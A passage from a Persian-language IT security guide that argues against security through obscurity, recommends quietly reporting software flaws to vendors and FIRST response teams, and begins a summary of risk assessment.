‫ﻧﺪﺍﺷﺘﻪ ﺑﺎﺷﺪ؛ ﻭ ﺍﮔﺮ ﻣﺴﺌﻠﻪﺍﻱ ﺑﺮﺍﻱ ﻳﻚ ﻳﺎ ﺩﻭ ﻧﻔـﺮ ﺍﺯ ﻛـﺎﺭﺑﺮﺍﻥ‬
‫ﻛﻪ ﻣﺠﺎﺯ ﺑﻪ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺍﺳﻨﺎﺩ ﺑﻮﺩﻩﺍﻧﺪ ﺭﺥ ﺩﻫﺪ‪ ،‬ﺩﻳﮕﺮ ﻛﺴﻲ ﺑـﺎ‬
‫ﺗﺠﺮﺑــﻪ ﻳــﺎ ﺍﻃﻼﻋــﺎﺕ ﻻﺯﻡ ﻭﺟــﻮﺩ ﻧــﺪﺍﺭﺩ ﻛــﻪ ﺩﺭ ﻣﻮﺍﻗــﻊ ﺑــﺮﻭﺯ‬
‫ﻣﺸﻜﻼﺕ ﻫﻤﻴﺎﺭﻱ ﻛﻨﺪ‪.‬‬
‫‪١٥٦‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻛﺎﺭﺑﺮﺩﻱ ﻧﻴﺰ ﻫﻴﭻ ﺗـﻀﻤﻴﻨﻲ ﺑـﺮﺍﻱ ﺗـﺄﻣﻴﻦ ﺍﻣﻨﻴـﺖ‬
‫ﺑﻮﺟﻮﺩ ﻧﻤﻲﺁﻭﺭﺩ‪ .‬ﻛﺴﺎﻧﻴﻜﻪ ﺗﺼﻤﻴﻢ ﮔﺮﻓﺘﻪ ﺑﺎﺷﻨﺪ ﺑﻪ ﺳﻴﺴﺘﻢ ﺷﻤﺎ‬
‫ﻭﺍﺭﺩ ﺷﻮﻧﺪ ﻫﺮ ﺍﺯ ﭼﻨﺪﮔﺎﻩ ﺣﻔﺮﻩﻫﺎﻱ ﺍﻣﻨﻴﺘـﻲ ﺭﺍ ﭘﻴـﺪﺍ ﻣـﻲﻛﻨﻨـﺪ؛‬
‫ﻣﺴﺘﻘﻞ ﺍﺯ ﺍﻳﻨﻜﻪ ﻣﺘﻦ ﺑﺮﻧﺎﻣﻪ ﺭﺍ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ ﻳﺎ ﻧﺪﺍﺷﺘﻪ‬
‫ﺑﺎﺷﻨﺪ‪ ٨٧.‬ﺍﻣﺎ ﺑﺪﻭﻥ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﻣﺘﻦ ﺑﺮﻧﺎﻣﻪ‪ ،‬ﻛﺎﺭﺑﺮﺍﻥ ﻧﻤﻲﺗﻮﺍﻧﻨﺪ‬
‫ﺁﻧﺮﺍ ﺑﻄﻮﺭ ﻣﺪﻭﻥ ﺑﺮﺭﺳﻲ ﻛﻨﻨﺪ ﺗﺎ ﻣـﺸﻜﻼﺕ ﺁﻧـﺮﺍ ﺑﻴﺎﺑﻨـﺪ؛ ﻭ ﻟـﺬﺍ‬
‫ﻫﺮﭼﻨﺪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺎ ﻣﺨﻔﻲ ﻧﮕﻬﺪﺍﺷﺘﻦ ﻣـﺘﻦ ﺑﺮﻧﺎﻣـﻪ ﻣﺰﻳـﺖ‬
‫ﻛﻮﭼﻜﻲ ﺑﻮﺟﻮﺩ ﺑﻴﺎﻳﺪ‪ ،‬ﺍﻣﺎ ﺍﻣﻨﻴـﺖ ﻧﺒﺎﻳـﺪ ﺑـﻪ ﺍﻳـﻦ ﻣﺨﻔـﻲﺑـﻮﺩﻥ‬
‫ﻭﺍﺑﺴﺘﮕﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ‪.‬‬
‫ﻧﮕﺮﺵ ﺑﻪ ﻣﻘﻮﻟﺔ ﺍﻣﻨﻴﺖ ﻳـﻚ ﻧﻜﺘـﺔ ﻛﻠﻴـﺪﻱ ﺍﺳـﺖ‪ .‬ﺩﺭﺻـﻮﺭﺕ‬
‫ﺧﺪﺷﻪﺩﺍﺭ ﺷﺪﻥ ﻣﺤﺮﻣﺎﻧﮕﻲ ﺁﻧﺪﺳﺘﻪ ﺍﺯ ﺍﻗﺪﺍﻣﺎﺕ ﺩﻓـﺎﻋﻲ ﻛـﻪ ﺑـﺮ‬
‫ﻣﺒﻨﺎﻱ ﻣﺨﻔﻲﻛﺎﺭﻱ ﺍﺳـﺘﻮﺍﺭﻧﺪ ﻫﻤﮕـﻲ ﺍﺭﺯﺵ ﺧـﻮﺩ ﺭﺍ ﺍﺯ ﺩﺳـﺖ‬
‫ﺧﻮﺍﻫﻨﺪ ﺩﺍﺩ‪ .‬ﺣﺘﻲ ﺑﺪﺗﺮ ﺍﺯ ﺁﻥ ﺍﻳﻨﻜـﻪ ﺗـﺪﺍﻭﻡ ﻣﺤﺮﻣـﺎﻧﮕﻲ ﺑﺎﻋـﺚ‬
‫ﺟﻠﻮﮔﻴﺮﻱ ﻳﺎ ﻣﺤﺪﻭﺩ ﺷﺪﻥ ﺑﺎﺯﺑﻴﻨﻲ ﻭ ﻧﻈﺎﺭﺕ ﺑﺮ ﺑﺮﻧﺎﻣﻪ ﻣﻲﺷـﻮﺩ‬
‫ﻭ ﻣﻤﻜﻦ ﺍﺳﺖ ﻫﺮﮔﺰ ﻧﺘﻮﺍﻥ ﻓﻬﻤﻴـﺪ ﻛـﻪ ﺁﻳـﺎ ﺍﻳـﻦ ﻣﺤﺮﻣـﺎﻧﮕﻲ‬
‫ﺧﺪﺷﻪﺩﺍﺭ ﺷﺪﻩ ﺍﺳﺖ ﻳﺎ ﺧﻴﺮ‪ .‬ﺑﻮﺳﻴﻠﺔ ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎ ﻭ ﻣﻜﺎﻧﻴﺰﻣﻬﺎﻳﻲ‬
‫ﻛﻪ ﺫﺍﺗﹰﺎ ﻣﺴﺘﺤﻜﻢ ﻫﺴﺘﻨﺪ ﻣﻲﺗﻮﺍﻥ ﺍﻣﻨﻴﺖ ﺑﻴﺸﺘﺮﻱ ﺑﺮﻗﺮﺍﺭ ﻛـﺮﺩ‪،‬‬
‫ﺣﺘﻲ ﺍﮔﺮ ﻣﻬﺎﺟﻢ ﺍﺯ ﺁﻧﻬﺎ ﺁﮔﺎﻫﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ‪ .‬ﺍﻳـﻦ ﺣﻘﻴﻘـﺖ ﻛـﻪ‬
‫ﺷﻤﺎ ﺍﺯ ﻣﻜﺎﻧﻴﺰﻣﻬﺎﻱ ﻣﺴﺘﺤﻜﻤﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻴﺪ ﻛـﻪ ﻫﻤـﻪ ﺍﺯ‬
‫ﺁﻥ ﺁﮔﺎﻫﻲ ﺩﺍﺭﻧﺪ ﻣﻤﻜﻦ ﺍﺳﺖ ﻣﻬـﺎﺟﻢ ﺭﺍ ﻧﺎﺍﻣﻴـﺪ ﻛﻨـﺪ ﻭ ﺑﺎﻋـﺚ‬
‫ﺷﻮﺩ ﺟﺎﻱ ﺩﻳﮕﺮﻱ ﻏﻴـﺮ ﺍﺯ ﺳﻴـﺴﺘﻤﻬﺎﻱ ﺷـﻤﺎ ﺑـﺪﻧﺒﺎﻝ ﻫﻴﺠـﺎﻥ‬
‫ﻧﺎﺷﻲ ﺍﺯ ﻧﻔﻮﺫ ﺑﺎﺷﺪ‪ .‬ﺍﮔﺮ ﭘﻮﻟﻬﺎﻳﺘﺎﻥ ﺭﺍ ﺩﺭ ﻳـﻚ ﻛـﺸﻮﻱ ﻗﻔـﻞﺩﺍﺭ‬
‫ﭘﻨﻬﺎﻥ ﻛﻨﻴﺪ ﺍﻣﻨﻴﺖ ﺁﻥ ﺑﻴﺸﺘﺮ ﺍﺯ ﺯﻣﺎﻧﻲ ﺍﺳﺖ ﻛﻪ ﻛﺴﻲ ﻧﺪﺍﻧـﺪ ﺍﺯ‬
‫ﭘﻮﻟﻬﺎﻳﺘﺎﻥ ﺩﺭ ﻳﻚ ﻗﻮﻃﻲ ﺳﺲ ﻣـﺎﻳﻮﻧﺰ ﺩﺭ ﻳﺨﭽـﺎﻝ ﻧﮕﻬـﺪﺍﺭﻱ‬
‫ﻣﻲﻛﻨﻴﺪ!‬
‫ﺍﻓﺸﺎﻱ ﻣﺴﺌﻮﻻﻧﻪ‬
‫ﻣﻘﺼﻮﺩ ﺍﺯ ﺍﻳﺮﺍﺩﻱ ﻛﻪ ﺑﻪ "ﺍﻣﻨﻴﺖ ﻣﺒﺘﻨﻲ ﺑﺮ ﺟﻬـﻞ ﻣﻬـﺎﺟﻢ" ﻭﺍﺭﺩ‬
‫ﺷﺪ ﺍﻳﻦ ﻧﻴﺴﺖ ﻛﻪ ﺑﮕﻮﻳﻴﻢ ﺑﻼﻓﺎﺻﻠﻪ ﺑﻌﺪ ﺍﺯ ﺍﻳﻨﻜـﻪ ﺣﻔـﺮﻩﻫـﺎﻱ‬
‫ﺍﻣﻨﻴﺘﻲ ﺭﺍ ﭘﻴﺪﺍ ﻛﺮﺩﻳـﺪ ﺁﻧـﺮﺍ ﺑﻄـﻮﺭ ﮔـﺴﺘﺮﺩﻩ ﺑـﻪ ﺍﻃـﻼﻉ ﻋﻤـﻮﻡ‬
‫ﺑﺮﺳﺎﻧﻴﺪ‪ .‬ﻣﻴﺎﻥ ﻣﺨﻔﻲﻛﺎﺭﻱ ﻭ ﺍﺣﺘﻴﺎﻁ ﺗﻔﺎﻭﺗﻬـﺎﻱ ﻋﻤـﺪﻩ ﻭﺟـﻮﺩ‬
‫ﺩﺍﺭﺩ‪ .‬ﺍﮔﺮ ﺩﺭ ﻳﻚ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺗﻮﺯﻳﻊﺷﺪﻩ ﻳﺎ ﭘﺮﻣﺼﺮﻑ ﺣﻔﺮﺓ ﺍﻣﻨﻴﺘـﻲ‬
‫ﻛﺸﻒ ﻛﺮﺩﻳﺪ ﺑﺎﻳﺪ ﺑﺪﻭﻥ ﺳﺮ ﻭ ﺻﺪﺍ ﻭ ﻫﺮﭼـﻪ ﺳـﺮﻳﻌﺘﺮ ﺁﻧـﺮﺍ ﺑـﻪ‬
‫‪۸۷‬‬
‫ﺗﺎ ﺯﻣﺎﻧﻲ ﻛﻪ ﺷﻤﺎ ﻫﻤﺔ ﻗﺴﻤﺘﻬﺎﻱ ﻳﻚ ﻧﺮﻡﺍﻓـﺰﺍﺭ ﺭﺍ ﺑﻮﺳـﻴﻠﺔ ﺧـﻮﺩ ﻭ ﺩﺭ‬
‫ﺍﻳﺴﺘﮕﺎﻩ ﻛﺎﺭﻱ ﺧﻮﺩﺗﺎﻥ ﺗﻮﺳﻌﻪ ﻧﺪﻫﻴﺪ‪ ،‬ﺍﻓﺮﺍﺩ ﻣﺨﺘﻠﻔﻲ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑـﻪ‬
‫ﻣﺘﻦ ﺑﺮﻧﺎﻣﻪ ﺩﺳﺘﺮﺳﻲ ﭘﻴﺪﺍ ﻛﺮﺩﻩ ﺑﺎﺷﻨﺪ ﻭ ﺍﻳﻦ ﺍﺣﺘﻤﺎﻝ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ ﻛـﻪ‬
‫ﻣﺘﻦ ﺑﺮﻧﺎﻣﻪ ﺗﺼﺎﺩﻓﹰﺎ ﻳﺎ ﺗﻌﻤﺪﹰﺍ ﺍﻓﺸﺎ ﺷﻮﺩ‪.‬‬
‫ﺗﻮﺳﻌﻪﺩﻫﻨـﺪﺓ ﺁﻥ ﻧـﺮﻡﺍﻓـﺰﺍﺭ ﺍﻃـﻼﻉ ﺩﻫﻴـﺪ‪ .‬ﻫﻤﭽﻨـﻴﻦ ﺗﻮﺻـﻴﻪ‬
‫ﻣﻲﻛﻨﻴﻢ ﻛﻪ ﺁﻧﺮﺍ ﺑﻪ ﺍﻃﻼﻉ ﻳﻜﻲ ﺍﺯ ﻣﺆﺳـﺴﺎﺕ ‪) FIRST‬ﻛـﻪ ﺩﺭ‬
‫ﺿﻤﻴﻤﺔ ‪ ۴‬ﺩﺭ ﻣﻮﺭﺩ ﺁﻧﻬﺎ ﺗﻮﺿﻴﺢ ﺩﺍﺩﻩ ﺷﺪﻩ( ﻧﻴﺰ ﺑﺮﺳﺎﻧﻴﺪ‪ .‬ﺍﻳﻦ ﻣﺆﺳﺴﺎﺕ‬
‫ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﻪ ﺗﻮﺳﻌﻪﺩﻫﻨﺪﮔﺎﻥ ﻛﻤﻚ ﻛﻨﻨﺪ ﺗﺎ ﺑـﺮﺍﻱ ﺣﻔـﺮﻩﻫـﺎﻱ‬
‫ﺍﻣﻨﻴﺘﻲ ﻛﺸﻒﺷﺪﻩ ﻭﺻﻠﻪﻫﺎﻳﻲ ﺗﻬﻴﻪ ﻧﻤﺎﻳﻨﺪ ﻭ ﻣﻄﻤﺌﻦ ﺷﻮﻧﺪ ﻛـﻪ‬
‫ﻭﺻﻠﻪﻫـﺎ ﺗﻮﺯﻳـﻊ ﺷـﺪﻩ ﻭ ﺑﻄـﻮﺭ ﺻـﺤﻴﺢ ﻣـﻮﺭﺩ ﺍﺳـﺘﻔﺎﺩﻩ ﻗـﺮﺍﺭ‬
‫ﮔﺮﻓﺘﻪﺍﻧﺪ‪.‬‬
‫ﺍﮔﺮ ﺣﻔﺮﺓ ﺍﻣﻨﻴﺘﻲ ﻳﻚ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺭﺍ ﺩﺭ ﺑـﻮﻕ ﻭ ﻛﺮﻧـﺎ ﻛﻨﻴـﺪ‪ ،‬ﺗﻤـﺎﻡ‬
‫ﺍﻓﺮﺍﺩﻱ ﺭﺍ ﻛﻪ ﺍﺯ ﺁﻥ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺍﺳـﺘﻔﺎﺩﻩ ﻣـﻲﻛﻨﻨـﺪ ﻭ ﻧﻤـﻲﺗﻮﺍﻧﻨـﺪ‬
‫ﺍﺷﻜﺎﻻﺕ ﺁﻧﺮﺍ ﺭﻓﻊ ﻛﻨﻨـﺪ ﺩﭼـﺎﺭ ﻣـﺸﻜﻞ ﻛـﺮﺩﻩﺍﻳـﺪ‪ .‬ﺩﺭ ﻣﺤـﻴﻂ‬
‫‪ Unix‬ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻛﺎﺭﺑﺮﺍﻥ ﻋﺎﺩﺕ ﻛﺮﺩﻩﺍﻧـﺪ ﻛـﻪ ﺑـﺮﺍﻱ ﺍﺻـﻼﺡ‬
‫ﺍﺷﻜﺎﻻﺕ ﻳﻚ ﺑﺮﻧﺎﻣﻪ‪ ،‬ﺩﺭ ﻣﺘﻦ ﺁﻥ ﺍﻳﺠﺎﺩ ﺗﻐﻴﻴﺮﺍﺕ ﻛﻨﻨﺪ‪.‬‬
‫ﻣﺘﺄﺳﻔﺎﻧﻪ ﻫﻤﻪ ﺍﺯ ﭼﻨﻴﻦ ﻗﺎﺑﻠﻴﺘﻲ ﺑﺮﺧﻮﺭﺩﺍﺭ ﻧﻴـﺴﺘﻨﺪ ﻭ ﺑـﺴﻴﺎﺭﻱ ﺍﺯ‬
‫ﻣﺼﺮﻑﻛﻨﻨﺪﮔﺎﻥ ﺑﺎﻳﺪ ﻫﻔﺘﻪﻫﺎ ﻳﺎ ﻣﺎﻫﻬﺎ ﺻﺒﺮ ﻛﻨﻨﺪ ﺗـﺎ ﻧـﺮﻡﺍﻓـﺰﺍﺭ‬
‫ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲﺷﺪﻩ ﺗﻮﺳﻂ ﻓﺮﻭﺷﻨﺪﺓ ﻣﺮﺑﻮﻃﻪ ﻣﻨﺘﺸﺮ ﺷـﻮﺩ‪ .‬ﺑﻌـﻀﻲ‬
‫ﺍﺩﺍﺭﺍﺕ ﻣﻤﻜﻦ ﺍﺳﺖ ‪ -‬ﺑﺪﻟﻴﻞ ﺍﻳﻨﻜﻪ ﺟﺰ ﺭﻭﺷﻦ ﻛـﺮﺩﻥ ﺭﺍﻳﺎﻧـﻪ ﻭ‬
‫ﻛﺎﺭ ﺑﺎ ﻧﺮﻡﺍﻓﺰﺍﺭ ﻣﻮﺭﺩ ﻧﻴﺎﺯ ﻛﺎﺭ ﺩﻳﮕﺮﻱ ﺑﺎ ﺭﺍﻳﺎﻧﻪ ﻧﻤـﻲﻛﻨﻨـﺪ ﻭ ﻳـﺎ‬
‫ﻧﺮﻡﺍﻓﺰﺍﺭﺷﺎﻥ ﺑﺮ ﺍﺳﺎﺱ ﺗﻨﻈﻴﻤﺎﺕ ﻣﻮﺟﻮﺩ ﮔﻮﺍﻫﻲ ﺩﺭﻳﺎﻓﺖ ﻛـﺮﺩﻩ‬
‫ﻭ ﻟﺬﺍ ﻧﻤﻲﺗﻮﺍﻧﻨﺪ ﭘﻴﻜﺮﺑﻨﺪﻱ ﺁﻧﺮﺍ ﺗﻐﻴﻴـﺮ ﺩﻫﻨـﺪ ‪ -‬ﺣﺘـﻲ ﻗـﺎﺩﺭ ﺑـﻪ‬
‫ﺍﺭﺗﻘﺎﻱ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺧﻮﺩ ﻫﻢ ﻧﺒﺎﺷﻨﺪ‪ .‬ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﻌﻀﻲ ﺳﻴﺴﺘﻤﻬﺎ‬
‫ﺗﻮﺳﻂ ﺍﻓﺮﺍﺩﻱ ﺭﺍﻫﺒﺮﻱ ﺷﻮﻧﺪ ﻛـﻪ ﻣﻬـﺎﺭﺕ ﻻﺯﻡ ﺑـﺮﺍﻱ ﺍﻋﻤـﺎﻝ‬
‫ﻭﺻﻠﻪﻫﺎ ﺭﺍ ﻧﺪﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ‪ ،‬ﻭ ﺍﺯ ﺳﺎﻳﺮ ﺳﻴﺴﺘﻤﻬﺎ ﻫﻢ ﺍﺳﺘﻔﺎﺩﺓ ﻓﻌﺎﻝ‬
‫ﻧﺸﻮﺩ ﻭ ﻳﺎ ﺧﺎﺭﺝ ﺍﺯ ﺣﻴﻄﺔ ﭘـﺸﺘﻴﺒﺎﻧﻲ ﺳـﺎﺯﻣﺎﻥ ﺑﺎﺷـﻨﺪ‪ .‬ﻫﻤﻴـﺸﻪ‬
‫ﻣﺴﺌﻮﻻﻧﻪ ﻋﻤﻞ ﻛﻨﻴﺪ‪ .‬ﺑﻬﺘﺮ ﺍﺳﺖ ﻳﻚ ﻭﺻﻠﻪ ﺭﺍ ﺑﺪﻭﻥ ﺗﻮﺿﻴﺢ ﺩﺭ‬
‫ﻣﻮﺭﺩ ﺯﻳﺮﺑﻨﺎﻱ ﺁﺳﻴﺐﭘﺬﻳﺮﻱ ﻣﺮﺑﻮﻃﻪ ﻣﻴﺎﻥ ﻛﺎﺭﻛﻨﺎﻥ ﺗﻮﺯﻳﻊ ﻛﻨﻴﻢ‪،‬‬
‫ﺗﺎ ﺍﻳﻨﻜﻪ ﺑﺨﻮﺍﻫﻴﻢ ﺑﻪ ﻣﻬﺎﺟﻤﺎﻥ ﺟﺰﺋﻴﺎﺗﻲ ﺩﺭ ﻣﻮﺭﺩ ﺭﻭﺷﻬﺎﻱ ﻧﻔﻮﺫ‬
‫ﺑﻪ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻭﺻﻠﻪﻧﺸﺪﻩ ﺍﺭﺍﺋﻪ ﻧﻤﺎﻳﻴﻢ‪.‬‬
‫ﻣﺎ ﻣﻮﺍﺭﺩ ﺯﻳﺎﺩﻱ ﺩﻳﺪﻩ ﺍﻳـﻢ ﻛـﻪ ﺩﺭ ﺁﻥ ﻓـﺮﺩﻱ ﻣﺘﺨـﺼﺺ ﻳـﻚ‬
‫ﺍﺷﻜﺎﻝ ﻣﻬﻢ ﺍﻣﻨﻴﺘﻲ ﺭﺍ ﺩﺭ ﻳﻚ ﮔﺮﻭﻩ ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺑـﺴﻴﺎﺭ‬
‫ﻋﻤﻮﻣﻲ ﮔﺰﺍﺭﺵ ﻛﺮﺩﻩ ﺍﺳﺖ‪ .‬ﺍﮔﺮﭼﻪ ﻫﺪﻑ ﺍﻳﻦ ﺷﺨﺺ ﺩﺭﻳﺎﻓﺖ‬
‫ﻳﻚ ﺍﺻﻼﺡ ﺳﺮﻳﻊ ﺍﺯ ﺟﺎﻧﺐ ﻓﺮﻭﺷﻨﺪﮔﺎﻥ ﺑﻮﺩﻩ‪ ،‬ﻭﻟﻲ ﻧﺘﻴﺠـﺔ ﻛـﺎﺭ‬
‫ﻣﻮﺟﻲ ﺍﺯ ﺗﻬﺎﺟﻤﺎﺕ ﺑﻪ ﺳﻴﺴﺘﻤﻬﺎﻳﻲ ﺷﺪﻩ ﻛﻪ ﺭﺍﻫﺒـﺮﺍﻥ ﺁﻧﻬـﺎ ﺑـﻪ‬
‫ﻣﻄﺎﻟﺐ ﺁﻥ ﮔﺮﻭﻩ ﭘﺴﺘﻲ ﺩﺳﺘﺮﺳﻲ ﻧﺪﺍﺷﺘﻪ ﻭ ﻳﺎ ﻗـﺎﺩﺭ ﺑـﻪ ﺍﻋﻤـﺎﻝ‬
‫ﺍﺻﻼﺡ ﺍﺭﺍﺋﻪﺷﺪﻩ ﻧﺒﻮﺩﻩﺍﻧﺪ‪.‬‬
‫ﺍﮔﺮ ﻫﻨﻮﺯ ﻭﺻﻠﻪﺍﻱ ﺑﺮﺍﻱ ﺁﺳﻴﺐﭘـﺬﻳﺮﻳﻬﺎﻱ ﺍﺧﻴـﺮ ﺳﻴـﺴﺘﻢ ﺷـﻤﺎ‬
‫ﻭﺟﻮﺩ ﻧﺪﺍﺷﺘﻪ ﺑﺎﺷﺪ‪ ،‬ﺍﺭﺳﺎﻝ ﺟﺰﺋﻴﺎﺕ ﺁﻧﻬﺎ ﺑﻪ ﻳـﻚ ﮔـﺮﻭﻩ ﭘـﺴﺘﻲ‬
‫ﻧﻪﺗﻨﻬﺎ ﺑﺴﻴﺎﺭﻱ ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﺩﻳﮕﺮ ﺭﺍ ﺑﻪ ﻣﺨﺎﻃﺮﻩ ﺧﻮﺍﻫﺪ ﺍﻧﺪﺍﺧﺖ‪،‬‬
‫ﺑﺨﺶ ﺳﻮﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ‬
‫ﺑﻠﻜﻪ ﺍﮔﺮ ﻳﻚ ﻧﻔﻮﺫﮔﺮ ﺍﺯ ﺁﻥ ﺍﺷﻜﺎﻝ ﺑـﺮﺍﻱ ﻧﻔـﻮﺫ ﺑـﻪ ﺳـﺎﻳﺘﻬﺎﻱ‬
‫ﺩﻳﮕﺮ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﺪ‪ ،‬ﻣﻤﻜﻦ ﺍﺳﺖ ﺩﺭ ﺭﺍﺑﻄﻪ ﺑـﺎ ﺧـﺴﺎﺭﺗﻬﺎﻱ ﻭﺍﺭﺩﻩ‬
‫ﻋﻠﻴﻪ ﺷﻤﺎ ﻧﻴﺰ ﺍﻗﺪﺍﻣﺎﺕ ﻗﺎﻧﻮﻧﻲ ﺻﻮﺭﺕ ﺑﮕﻴﺮﺩ‪ ٨٨.‬ﺍﮔﺮ ﺷﻤﺎ ﻧﮕـﺮﺍﻥ‬
‫ﺍﻣﻨﻴﺖ ﺧﻮﺩ ﻫﺴﺘﻴﺪ ﻣﺘﻮﺟـﻪ ﺑﺎﺷـﻴﺪ ﻛـﻪ ﺟﺰﺋـﻲ ﺍﺯ ﻳـﻚ ﺟﺎﻣﻌـﻪ‬
‫ﻣﻲﺑﺎﺷﻴﺪ‪ .‬ﺩﺭ ﺟﺎﻣﻌﻪ ﺑﺎﻳﺪ ﺑﺪﻧﺒﺎﻝ ﺗﻘﻮﻳﺖ ﺍﻣﻨﻴﺖ ﺩﻳﮕﺮﺍﻥ ﻫﻢ ﺑـﻮﺩ‬
‫ﻭ ﺑﻪ ﻳﺎﺩ ﺩﺍﺷﺖ ﻛﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺭﻭﺯﻱ ﻫﻢ ﻣﺎ ﺑﻪ ﻛﻤﻚ ﺩﻳﮕﺮﺍﻥ‬
‫ﻧﻴﺎﺯ ﭘﻴﺪﺍ ﻛﻨﻴﻢ‪.‬‬
‫ﺟﻤﻊﺑﻨﺪﻱ ﺑﺤﺚ ﭘﻴﺸﮕﻴﺮﻱ ﻭ ﺳﻴﺎﺳﺖ‬
‫ﻛﻠﻴﺪ ﺍﺭﺯﻳﺎﺑﻲ ﻣﺨﺎﻃﺮﺓ ﻣﻮﻓﻖ‪ ،‬ﺗﺸﺨﻴﺺ ﻫﻤﺔ ﺗﻬﺪﻳﺪﺍﺕ ﻣﻤﻜـﻦ‬
‫ﻋﻠﻴﻪ ﺳﻴﺴﺘﻢ ﻭ ﺩﻓﺎﻉ ﺩﺭ ﺑﺮﺍﺑﺮ ﺣﻤﻼﺗﻲ ﺍﺳﺖ ﻛـﻪ ﺍﺯ ﻧﻈـﺮ ﺷـﻤﺎ‬
‫ﺍﺣﺘﻤﺎﻝ ﻭﻗﻮﻉ ﺑﻴﺸﺘﺮﻱ ﺩﺍﺭﻧﺪ‪.‬‬
‫ﺑﺎ ﺗﻮﺟﻪ ﺑﻪ ﺍﻳﻦ ﻣﺤﺪﻭﺩﻳﺘﻬﺎ ﺷﻤﺎ ﺑﺎﻳﺪ ﺑﺎ ﺍﻭﻟﻮﻳﺘﻬﺎﻳﻲ ﻛـﻪ ﺍﺯ ﻗﺒـﻞ‬
‫‪۸۸‬‬
‫ﻫﺮﭼﻨﺪ ﻣﺎ ﻫﻨﻮﺯ ﻭﻗﻮﻉ ﭼﻨﻴﻦ ﻣﻮﺭﺩﻱ ﺭﺍ ﻧﺪﻳﺪﻩﺍﻳﻢ‪ ،‬ﺍﻣﺎ ﻭﻛﻴﻼﻥ ﻣﺘﻌﺪﺩﻱ‬
‫ﺑﻪ ﻣﺎ ﮔﻔﺘﻪﺍﻧﺪ ﻛﻪ ﺍﻧﺘﻈﺎﺭ ﺩﺍﺭﻧﺪ ﻣﻮﻛﻼﻧﺸﺎﻥ ﺍﻧﺠـﺎﻡ ﭼﻨـﻴﻦ ﻛـﺎﺭﻱ ﺭﺍ ﺍﺯ‬
‫ﺁﻧﻬﺎ ﺑﺨﻮﺍﻫﻨﺪ‪.‬‬
‫ﻼ ﻓﻜﺮ ﻛﺮﺩﻩﺍﻳﺪ ﺑﻪ ﺳﺮﺍﻍ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧـﻪﺍﻱ ﺑﺮﻭﻳـﺪ؛‬
‫ﺭﻭﻱ ﺁﻧﻬﺎ ﻛﺎﻣ ﹰ‬
‫ﭼﺮﺍﻛﻪ ﻧﻤﻲﺗﻮﺍﻧﻴﺪ ﺩﺭ ﻣﻘﺎﺑﻞ ﺗﻤـﺎﻡ ﺗﻬﺪﻳـﺪﺍﺕ ﻣﻤﻜـﻦ‪ ،‬ﺣﻔﺎﻇـﺖ‬
‫ﺑﻮﺟﻮﺩ ﺁﻭﺭﻳﺪ‪ .‬ﮔـﺎﻫﻲ ﺍﻭﻗـﺎﺕ ﺑﺠـﺎﻱ ﺟﻠـﻮﮔﻴﺮﻱ ﺍﺯ ﻭﻗـﻮﻉ ﻳـﻚ‬
‫ﻣﺸﻜﻞ ﺑﺎﻳﺪ ﺍﺟﺎﺯﻩ ﺩﻫﻴﺪ ﺁﻥ ﻣﺸﻜﻞ ﺭﺥ ﺩﻫﺪ ﻭ ﺳـﭙﺲ ﺑـﻪ ﺭﻓـﻊ‬
‫ﺁﺛﺎﺭ ﺁﻥ ﺍﻗﺪﺍﻡ ﻛﻨﻴﺪ‪ .‬ﺑﺮﺍﻱ ﻣﺜﺎﻝ ﺩﺭ ﻣﻮﺍﺟﻬﻪ ﺑﺎ ﻳﻚ ﻗﻄﻌـﻲ ﺑـﺮﻕ‬
‫ﻣﻤﻜﻦ ﺍﺳﺖ ﺷﺮﺍﻳﻂ ﻃﻮﺭﻱ ﺑﺎﺷﺪ ﻛـﻪ ﺍﮔـﺮ ﺑﮕﺬﺍﺭﻳـﺪ ﺳﻴـﺴﺘﻤﻬﺎ‬
‫ﺧﺎﻣﻮﺵ ﻭ ﺭﺍﻩﺍﻧـﺪﺍﺯﻱ ﻣﺠـﺪﺩ ﺷـﻮﻧﺪ ﺑﺮﺍﻳﺘـﺎﻥ ﺑـﺴﻴﺎﺭ ﺍﺭﺯﺍﻧﺘـﺮ ﺍﺯ‬
‫ﺧﺮﻳﺪﺍﺭﻱ ﻳﻚ ﺳﻴﺴﺘﻢ ‪ UPS‬ﺗﻤﺎﻡ ﺷﻮﺩ‪.‬‬
‫ﻣﻮﺍﺭﺩ ﺩﻳﮕﺮﻱ ﻫﺴﺘﻨﺪ ﻛﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺷـﻤﺎ ﺩﺭ ﻣـﻮﺭﺩ ﺩﻓـﺎﻉ ﺩﺭ‬
